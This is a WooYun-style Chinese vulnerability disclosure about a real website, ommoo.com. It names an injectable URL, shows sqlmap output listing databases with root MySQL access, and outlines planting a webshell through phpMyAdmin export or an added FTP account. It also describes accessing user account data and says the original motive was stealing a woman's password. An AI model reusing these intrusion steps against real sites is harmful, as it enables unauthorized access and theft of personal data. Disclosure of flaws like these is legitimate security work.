WooYun.org

老实说，这网站我拿了一年···
当年为了泡到一个妹纸，想拿下该网站权限以取得她的常用密码。
当年各种扫描，google hack ，xss,社工，一个星期左右就放弃了。
一年后的今天，她早已贵为人妻····
大概看了看，是php的，然后后台地址是http://www.ommoo.com/admin/index.php?m=Public&a=login````注入在http://www.ommoo.com/u.php?action=prettify&uid=177071这里and 1=1 和and 1=2就能看出变化。丢入sqlmap跑跑···得到
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0
[15:35:52] [INFO] fetching database names
[15:35:52] [INFO] the SQL query used returns 8 entries
[15:35:52] [INFO] resumed: information_schema
[15:35:52] [INFO] resumed: ftpusers
[15:35:52] [INFO] resumed: ms
[15:35:52] [INFO] resumed: mysql
[15:35:52] [INFO] resumed: test
[15:35:52] [INFO] resumed: w3_ommoo_com
[15:35:52] [INFO] resumed: wbl
[15:35:52] [INFO] resumed: zol_wbl
available databases [8]:
[*] ftpusers
[*] information_schema
[*] ms
[*] mysql
[*] test
[*] w3_ommoo_com
[*] wbl
[*] zol_wbl

找到myssql，是root权限。

里面还有FTP的数据库，旁站可能有FTP管理器之类的···

还有phpmyadmin~~

拿下webshell很简单，有两种方法，根据两张图所诉的物理连接，通过注入拿到phpmyadmin的密码，然后导出webshell··
第二种直接通过ftp管理添加帐号密码，然后上传个webshell。

可以看到全部分站都在，可写可读···
接下来就是用户数据``还好没有明文保存，话说我连我自己的密码都忘记了。

打上个LOGO把··防止某些黑客拿截图去骗钱···
可以看到含有f的是男的，含有m的是女生把。
至于邮箱和密码一长串字符的，那些我估计应该是微博帐号或者QQ帐号绑定的。
随便登陆一个官方帐号试试···